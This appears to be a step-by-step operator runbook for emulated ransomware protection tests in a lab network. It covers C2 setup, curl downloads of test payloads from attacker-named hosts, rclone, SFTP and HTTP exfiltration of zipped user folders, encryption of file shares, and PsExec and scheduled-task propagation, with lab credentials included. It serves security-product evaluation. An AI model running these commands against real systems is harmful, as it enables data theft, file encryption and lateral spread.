# Ransomware Protections Micros

• From your Kali attack host corsair (223.246.0.70), open a new terminal tab and run the following commands to start the C2 server for protections:

cd /opt/kalidev/evalsC2server
sudo go build -o controlServer main.go
sudo ./controlServer -c config/protections.yml

• ⚠️ Ensure that the C2 has started with the [Simple File Server] handler enabled.

Test 1 emulates ransomware affiliates enumerating via batch script and exfiltration of files of interest via rclone. The setup on the victim host for this test includes pre-positioning of a batch script on victim bts (10.222.25.61) in C:\Windows\Temp\test1.bat and opening an elevated Command Prompt as sonicbeats37.fm\yoona.

The test begins with execution of the batch script. The batch script will enumerate all user Desktop, Documents, and Downloads directories, create zips of files within the target directories, then exfiltrate the zips using rclone to the adversary server at m1sfir3d.blog (36.43.97.151). The batch script will sleep for 30 seconds in between zip creations and rclone exfiltrations.

• From your Kali attack host corsair (223.246.0.70), open a new terminal tab to setup the rclone server to receive the exfiltrated files:

  sudo rclone serve webdav /srv/http --addr 223.246.0.70:8080

• Ensure the Simple File Server handler is enabled and running

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP to bts (10.222.25.61) as sonicbeats37.fm\yoona if not already connected

  Hostname	Username	Password
  bts.sonicbeats37.fm	sonicbeats37.fm\yoona	Exposed-Backpack

• Search for Command Prompt and right-click to Run As Administrator

• Download the batch script from the adversary server using curl

  curl --output "C:\Windows\Temp\test1.bat" http://m1sfir3d.blog/files/test1.bat

• Execute the batch script from your Administrative Command Prompt terminal.

  C:\Windows\Temp\test1.bat http://36.43.97.65

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• In the elevated Command Prompt withing the RDP to bts (10.222.25.61), download the cleanup script using curl.

  curl --output "C:\Windows\Temp\cleanup_test1.bat" http://m1sfir3d.blog/files/cleanup_test1.bat

• Execute the cleanup script.

  C:\Windows\Temp\cleanup_test1.bat

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 2 emulates a ransomware threat actor attempting to zip files and exfiltrate them via SFTP on a windows target. The setup includes pre-positioning an executable file on a victim host bts (10.222.25.61) at the location C:\Windows\Temp\test2.exe. A command prompt window will be opened as user yoona and the executable will be run without arguments.

The test begins with enumeration of all user directories inside of C:\Users\. Any Desktop, Documents, or Downloads directory will be zipped into individual zip archives. The executable will sleep for 15-30 seconds after each zip file creation.

After all of the zips have been created, the executable will establish a connection to the attacker-controlled SFTP server. Once established, the executable will upload each zip archive to the SFTP server, sleeping for 15-30 seconds after each upload has completed. Finally, the executable will output the list of uploaded files in the SFTP server.

• From your Kali attack host corsair (223.246.0.70), open a new terminal tab and execute the following command to ensure that the SFTP server is running:

  sftp sftp_user@36.43.97.72

  Username	Password
  sftp_user	Password1!

• After successful authentication, run the following commands:

  pwd
  ls

If the server responds without error, the SFTP server is running correctly.

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP into the victim host bts (10.222.25.61) as sonicbeats37.fm\yoona if not already connected.

  Hostname	Username	Password
  bts.sonicbeats37.fm	sonicbeats37.fm\yoona	Exposed-Backpack

• Open an elevated command prompt and execute the following command to download the test binary from the attacker server:

  curl.exe --output "C:\Windows\Temp\test2.exe" http://d3fend-ev1l.radio/files/test2.exe

• Change directories to the directory containing the test2.exe binary.

  cd C:\Windows\Temp

• Execute the test binary.

test2.exe

After the executable has finished running, check that zip archives were uploaded to the SFTP server:

➡️ Switch to your Kali attacker machine and open a terminal tab.

• Run the following command to log into SFTP:

sftp sftp_user@36.43.97.72

• After successful authentication, run the following commands:

ls

If there are zip files present, the test completed successfully.

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• Run the following command to remove the created zip files from the victim host, and then check that there are no zip files left and the executable has been removed:

del *.zip
del test2.exe
dir

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 3 emulates a ransomware threat actor attempting to zip files in 1MB chunks and exfiltrate them via HTTP on a Linux target. The setup includes pre-positioning an executable file on a victim host lisa (10.222.25.65) at the location /tmp/test3. A terminal window will be opened as user user2 and the executable will be run without arguments.

The test begins with enumeration of all user directories inside of /home/. All files found in the Desktop, Documents, or Downloads directories will be zipped into zip archives up to 1MB.

After all of the zips have been created, the executable will upload each zip archive to the adversary server via HTTP POST requests.

• Ensure the Simple File Server handler is enabled and running from your Kali attack host corsair (223.246.0.70)

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), open Powershell and SSH into the victim host lisa (10.222.25.65) as sonicbeats37.fm\sooyoung using the following command:

  ssh sooyoung@10.222.25.65

  Hostname	Username	Password
  lisa.sonicbeats37.fm	sonicbeats37.fm\sooyoung	Dental-Crew

• Execute the following command in your terminal to download the test binary from the attacker server:

  curl --output "/tmp/test3" http://c4sh-m0n33y.fr/files/test3

• Change directories to the directory containing the test3 binary.

  cd /tmp

• Change the binary to be executable

  chmod +x test3

• Execute the test binary.

  ./test3

• Check the control server log to ensure that the zip archives were uploaded to the attack host.

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• From the /tmp/ directory, run the following command to remove the created zip files and executable from the victim host, and check that everything has been successfully removed.

  rm archive*
  rm test3
  ls

• Terminate the controlServer via 'ctrl+c' from your Kali machine

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 4 emulates a ransomware threat actor attempting to encrypt files on a remote windows file server using a PowerShell script. The setup includes copying the contents of a PowerShell script from a non-victim browser. A PowerShell window will be opened as user yoona. The script will be executed with the appropriate arguments targeting the mounted drive of the managed remote file server.

The test begins with enumeration of all files and directories inside of Z:\ using Get-ChildItem. After all files have been enumerated, they will all be encrypted using an encryption key generated by the test4 application. Target files will be overwritten by the corresponding encrypted contents.

➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP into the victim host bts (10.222.25.61) as sonicbeats37.fm\yoona if not already connected.

• Search for and open PowerShell

• ➡️ In a Browser on a non-victim machine, browse to test4.ps1 and copy the script contents.

• ➡️ Return to the RDP to bts (10.222.25.61). Paste the test4.ps1 content into the PowerShell window and press enter.

• Execute the test with the target file path.

Execute-Test -action encrypt -startFolder Z:\

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• Rerun the the test4 script with the decrypt action.

Execute-Test -action decrypt -startFolder Z:\ -key [KEY GENERATED DURING ENCRYPTION]

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 5 emulates a ransomware threat actor attempting to encrypt files on a remote windows file server using third party libraries and Windows API's. The setup includes pre-positioning an executable file on an unmanaged victim host eyescream (199.88.44.201) at the location C:\Windows\Temp\test5.exe. A command prompt window will be opened as user yoona. The executable will be executed with the argument Z:\ targeting the mounted drive of the managed remote file server.

The test begins with enumeration of all files and directories inside of Z:\. Any file that is deemed not a system file, sym-link, or directory will be added to a file list. After all files have been enumerated, they will all be encrypted using an encryption key generated by the test5 application. The executable will sleep for 250-1000 milliseconds after each file is encrypted.

➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP into the victim host eyescream (199.88.44.201) as op1 if not already connected.

• Search for and open Command Prompt

• Execute the following command to transfer the file to the victim host:

  curl --output "C:\Windows\Temp\test5.exe" http://223.246.0.70/files/test5.exe

• Change directories to the directory containing the test5.exe binary.

  cd C:\Windows\Temp

• Execute the following command to ensure the Z: network drive is mapped:

  net use

  • If the Z: is not mounted to asix (10.222.15.15), mount the share and enter the password when prompted:

    net use Z: \\10.222.15.15\D$\data /persistent:yes /user:sonicbeats37.fm\sooyoung Dental-Crew

• Execute the test binary with the target file path.

C:\Windows\Temp\test5.exe Z:\ encrypt

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• Rerun the the test5 application with the decrypt argument and unmount the file share.

C:\Windows\Temp\test5.exe Z:\ decrypt
net use Z: /delete

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 6 emulates a ransomware threat actor attempting to encrypt files on a Linux file system using OpenSSL in a bash script. The setup includes pre-positioning a bash file on victim host lisa (10.222.25.65) at the location /tmp/test6.sh. The script will be executed with the argument /home.

Once the script is executed it will begin enumerating all files and directories inside of /home. Any file that is deemed not a directory will be encrypted using an encryption key generated with OpenSSL inside the test6 bash script.

• From your Kali attack host corsair (223.246.0.70), open a new terminal tab and execute the following command to transfer the file to the victim host:

  scp /opt/kalidev/LockBit/Resources/payloads/test6.sh sooyoung@10.222.25.65:/tmp/

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), open Powershell and SSH into the victim host lisa (10.222.25.65) as sonicbeats37.fm\sooyoung using the following command:

  ssh sooyoung@10.222.25.65

  Hostname	Username	Password
  lisa.sonicbeats37.fm	sonicbeats37.fm\sooyoung	Dental-Crew

• Adjust the bash script permissions to allow the script to execute:

  chmod +x /tmp/test6.sh

• Execute the test bash script with the target file path.

sudo /tmp/test6.sh /home

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• No cleanup available for Test 6. Reset lisa (10.222.25.65) if needed.

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 7 emulates a threat actor that uses NetBIOS scans and PsExec to propagate across Windows devices in a network.

The test setup includes pre-positioning an executable file on a Windows workstation bts (10.222.25.61) at the location C:\Windows\Temp\test7.exe. A command prompt window will be opened as domain admin sooyoung. The executable will be executed with no arguments and will log activity to test7.log in the current working directory.

The test begins with discovering which local networks the workstation is on and scanning those networks with NetBIOS lookups to see which IP addresses respond as Windows machines. Upon having discovered at least one Windows target, the test binary will drop an embedded PsExec binary to disk at C:\Windows\Temp\pm.exe and run it to copy itself and execute itself on each target. The propagated processes will attempt to run as the SYSTEM user.

➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP into the victim host bts (10.222.25.61) as sonicbeats37.fm\sooyoung.

• Search for Command Prompt and right-click to Run As Administrator then execute the following command to download the test binary from the attacker server:

curl.exe --output "C:\Windows\Temp\test7.exe" http://off1ce-p4p4r.co.uk/files/test7.exe

• In the Command Prompt window, change directories to the directory containing the test7.exe binary.

cd C:\Windows\Temp

• Execute the test binary

C:\Windows\Temp\test7.exe

• If the command prompt window remains open, look through the terminal output to confirm that NetBIOS scanning found at least 1 target and that PsExec was successfully dropped and executed against the target hosts.

• If the EDR tooling closes the command prompt window as part of its blocking process, open a PowerShell terminal and run the following command to view the log file and determine how far the test binary got prior to the block:

type C:\Windows\Temp\test7.log

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• Open an elevated PowerShell prompt on workstation and execute the following:

rm -force C:\windows\temp\test7.exe
rm -force C:\Windows\temp\pm.exe
Invoke-Command -Computer exo -Scriptblock {
    rm -force C:\Windows\test7.exe;
}

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 8 emulates a threat actor that uses remote scheduled tasks to propagate from a file server to hosts that are connected to the file server's shares.

The test setup includes pre-positioning an executable file on a file server asix (10.222.15.15) at the location C:\Windows\Temp\test8.exe. A command prompt window will be opened as domain admin user sooyoung. The executable will be executed with no arguments and will log activity to test8.log in the current working directory.

The test begins with enumeration of all hosts that have a connected network session to the file server. For each discovered host, the test binary will copy itself to the C:\Windows\System32 folder of the remote host and then create a scheduled task \Microsoft\Windows\Net Session File Management Task on the remote host. The created task will automatically execute 15 seconds after being registered.

• ➡️ RDP into the victim workstation bts (10.222.25.61) as sonicbeats37.fm\yoona if not already connected.

  Hostname	Username	Password
  bts.sonicbeats37.fm	sonicbeats37.fm\yoona	Exposed-Backpack

  ⭕ Disconnect (do not sign out) from bts (10.222.25.61)

• ➡️ RDP into the victim workstation exo (10.222.25.62) as sonicbeats37.fm\sunny.

  Hostname	Username	Password
  exo.sonicbeats37.fm	sonicbeats37.fm\sunny	Angular-Porch

  ⭕ Disconnect (do not sign out) from exo (10.222.25.62)

• ➡️ RDP into the domain controller blackpink (10.222.15.10) as sonicbeats37.fm\sooyoung.

  Hostname	Username	Password
  blackpink.sonicbeats37.fm	sonicbeats37.fm\sooyoung	Dental-Crew

  ⭕ Disconnect (do not sign out) from blackpink (10.222.15.10)

• ➡️ RDP into the victim file server asix (10.222.15.15) as sonicbeats37.fm\sooyoung.

  Hostname	Username	Password
  asix.sonicbeats37.fm	sonicbeats37.fm\sooyoung	Dental-Crew

• Open an elevated command prompt and execute the following command to download the test binary from the attacker server:

  curl.exe --output "C:\Windows\Temp\test8.exe" http://p1nk-p3ncil.net/files/test8.exe

• Change directories to the directory containing the test8.exe binary.

  cd C:\Windows\Temp

• Execute the test binary

C:\Windows\Temp\test8.exe

• If the command prompt window remains open, look through the log messages to confirm that host enumeration, remote file copies, and remote scheduled task creation were successful.

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• Open an elevated PowerShell prompt on the file server and execute the following:

rm -force C:\Windows\Temp\test8.exe
Invoke-Command -Computer bts,exo,blackpink -Scriptblock {
    schtasks /delete /TN "\Microsoft\Windows\Net Session File Management Task" /F;
    rm -force C:\Windows\System32\test8.exe;
}

ℹ️ NOTE: Only the techniques under test are listed in this table